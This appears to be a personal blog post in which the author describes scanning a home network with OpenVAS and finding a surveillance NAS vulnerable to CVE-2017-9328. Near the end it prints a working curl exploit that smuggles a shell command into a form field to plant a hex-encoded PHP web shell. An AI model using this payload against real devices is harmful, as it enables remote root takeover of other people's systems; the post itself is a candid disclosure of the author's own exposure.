OK, a lot of us have large home networks. And our security strategy is simple… “Allow all outbound, deny all inbound.”. Mission accomplished, right? We bought the $100-$150 router, it must be better than the $50 one?
Well, it turns out that we might have erected a house made of tissue, a floor which is a petri dish full of agar, and invited the internet to sneeze on us. We are strong as the weakest link. But fortunately, since we don’t look, we don’t know, we feel good.
So today I looked (again, i’ve done this in the past). And the ‘groan’ i produced measured on the richter scale. You see, I ran OpenVAS. And I ran it so that it spanned all the subnets in my house (the good, the bad, the ugly, the evil). And I let it wander. And now, well, I have work and worry. Work because now I will have to go and find the firmware update for a bunch of things that might not have it. And, because I have the skillset, then I will sit and ponder: well, there is an open-source update I can put on that, I just have to…. and then this rabbit hole becomes a day of finding the jtag/ttl serial cable/…, compile and install. Yes afterwards I’m much happier. But, well, its a day. Per device. And there is quite a few. And a lot of them, well, there is no OSS. So do i bin them? Sell them on ebay w/ a ‘warning: this evil device will drink you beer and make your dog hate you’ disclaimer?
So case in point. A bunch of years ago I did a speaking thing at some conference. Usually these end w/ me leaving the stage and the organisers are no where in sight. But this time, someone met me, thanked me, and handed me a modest Amazon gift-card for my trouble. Hmm, what to do? Well, I think, why not offload the security cameras to their own low-power NAS? I mean, the big ZFS system can handle this, but if I get a small embedded one, I can put it on the surveillance network, and then they won’t need to get to the NAS, its better right?
Well, now I have CVE-2017-9328 (and more here). And the story checks out, anyone w/ access to that subnet can run any command they want as root with no real thinking. If you can spell ‘curl’ you can be root on my nas. and then wander outwards from it. Grr. And since i was more worried about the cameras, they are isolated *via* this. E.g. they can only reach it, but it can ‘reach around’ as it were.
So yeah, just type
curl 'http://IP-ADDRESS-OF-NAS:8181/include/ajax/GetTest.php' -X POST --data 'dev=b1bebe&testtype=start;\"$(echo -en "\\x3c\\x3f\\x70\\x68\\x70\\x20\\x70\\x61\\x73\\x73\\x74\\x68\\x72\\x75\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x69\\x22\\x5d\\x29\\x3b\\x20\\x3f\\x3e\\n" > xploited.php);'
and my NAS is belong to you.
(and this is not the only item in the list, i’ll have to chew it all down now… There goes days of time).
OK, so poll below.